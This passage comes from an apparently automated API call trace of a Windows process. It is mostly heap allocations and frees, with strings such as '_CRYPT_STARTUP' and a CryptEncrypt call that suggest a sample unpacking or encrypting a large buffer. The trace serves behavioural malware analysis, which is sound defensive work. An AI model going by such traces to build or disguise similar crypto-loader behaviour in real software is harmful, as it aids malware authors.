lpMsg=0x8cf3b8) returned 0 [0266.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0266.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0266.517] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0266.517] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0266.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0266.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0266.517] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0266.517] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0266.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0266.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0266.517] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.517] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0266.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0266.518] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0266.518] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0266.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0266.518] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0266.518] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0266.518] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0266.518] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0266.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0266.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0266.518] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.518] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0266.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0266.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0266.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0266.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0266.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0266.519] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.519] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0266.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0266.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0266.521] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0266.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0266.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0266.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0266.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0266.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51dc0 [0266.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51dc0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0266.522] CryptEncrypt (in: hKey=0xa873d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x13e31, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x13e38) returned 1 [0266.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0266.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0266.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0266.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0266.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0266.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0266.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0266.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0266.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0266.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0266.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0266.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0266.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0266.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0266.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0266.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0266.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0266.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0266.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0266.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0266.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0266.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0266.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0266.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0266.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0266.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0266.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0266.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0266.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0266.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0266.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0266.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0266.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0266.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0266.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0266.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0266.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0266.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0266.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0266.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0266.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0266.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0266.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0266.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0266.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0266.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0266.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0266.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0266.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0266.523] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0266.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0266.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0266.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0266.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0266.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0266.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0266.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0266.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0266.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0266.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0266.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0266.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0266.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0266.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0266.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0266.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0266.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0266.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0266.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0266.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0266.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0266.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0266.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0266.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0266.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0266.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0266.524] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0266.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0266.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0266.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0266.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0266.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0266.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0266.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0266.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0266.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0266.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0266.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0266.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0266.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f155c8 [0266.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f153a0 | out: hHeap=0x970000) returned 1 [0266.525] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0266.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0266.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0266.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0266.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0266.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0266.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0266.525] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0266.526] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0266.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0266.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0266.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0266.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0266.526] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0266.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0266.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0266.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0266.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0266.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0266.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0266.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0266.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0266.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0266.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0266.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0266.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0266.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0266.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0266.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0266.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0266.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0266.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0266.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0266.527] CharLowerBuffW (in: lpsz="byte[81464]", cchLength=0xb | out: lpsz="byte[81464]") returned 0xb [0266.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0266.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0266.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0266.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0266.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0266.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0266.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0266.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0266.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0266.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0266.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0266.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0266.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0266.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13e38) returned 0xe63e88 [0266.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0266.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0266.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0266.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0266.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0266.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0266.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0266.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0266.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0266.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0266.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0266.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0266.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0266.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0266.530] PeekMessageW 